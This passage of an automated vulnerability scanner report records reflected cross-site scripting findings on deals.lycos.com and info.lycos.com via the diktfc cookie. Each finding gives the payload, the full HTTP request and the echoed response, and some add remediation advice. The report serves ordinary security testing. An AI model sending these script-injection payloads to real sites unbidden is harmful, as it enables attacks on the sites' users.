Request

GET /search HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c9bf"%3balert(1)//4aaaae1a092; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c9bf";alert(1)//4aaaae1a092"
});
</script>
...[SNIP]...

1.326. http://deals.lycos.com/search [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /search

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1501"><script>alert(1)</script>87fbb33321 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321&amp;cj=1" alt="tracker" />
...[SNIP]...

1.327. http://deals.lycos.com/sitemap [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /sitemap

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafee"><script>alert(1)</script>fbcae48b9db was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /sitemap HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/sitemap&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db&amp;cj=1" alt="tracker" />
...[SNIP]...

1.328. http://deals.lycos.com/sitemap [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /sitemap

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33ede"%3balert(1)//7c98567bc37 was submitted in the diktfc cookie. This input was echoed as 33ede";alert(1)//7c98567bc37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A33ede"%3balert(1)//7c98567bc37; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/sitemap",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A33ede";alert(1)//7c98567bc37"
});
</script>
...[SNIP]...

1.329. http://info.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c5a"><script>alert(1)</script>3400436c004 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.330. http://info.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6579b"%3balert(1)//ffb8b1bf352 was submitted in the diktfc cookie. This input was echoed as 6579b";alert(1)//ffb8b1bf352 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6579b"%3balert(1)//ffb8b1bf352; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6579b";alert(1)//ffb8b1bf352.lycos.com"
});
</script>
...[SNIP]...

1.331. http://info.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3c4"><script>alert(1)</script>85e243e865f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.332. http://info.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab342"%3balert(1)//c4c4ec323f6 was submitted in the diktfc cookie. This input was echoed as ab342";alert(1)//c4c4ec323f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aab342"%3balert(1)//c4c4ec323f6; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aab342";alert(1)//c4c4ec323f6.lycos.com"
});
</script>
...[SNIP]...

1.333. http://info.lycos.com/contact.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /contact.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de0ae"><script>alert(1)</script>80df0ab27b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Cont
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/contact.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.334. http://info.lycos.com/contact.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /contact.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 886fa"%3balert(1)//da603ed9901 was submitted in the diktfc cookie. This input was echoed as 886fa";alert(1)//da603ed9901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa"%3balert(1)//da603ed9901; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Cont
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/contact.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A886fa";alert(1)//da603ed9901.lycos.com"
});
</script>
...[SNIP]...

1.335. http://info.lycos.com/copyright.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /copyright.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27849"%3balert(1)//a9b9c529a48 was submitted in the diktfc cookie. This input was echoed as 27849";alert(1)//a9b9c529a48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /copyright.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849"%3balert(1)//a9b9c529a48; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Abus
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/copyright.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849";alert(1)//a9b9c529a48.lycos.com"
});
</script>
...[SNIP]...

1.336. http://info.lycos.com/copyright.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /copyright.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d10bb"><script>alert(1)</script>e5827dbe638 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /copyright.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Abus
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/copyright.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.337. http://info.lycos.com/jobs.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /jobs.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5251b"><script>alert(1)</script>887c4447e55 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jobs.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
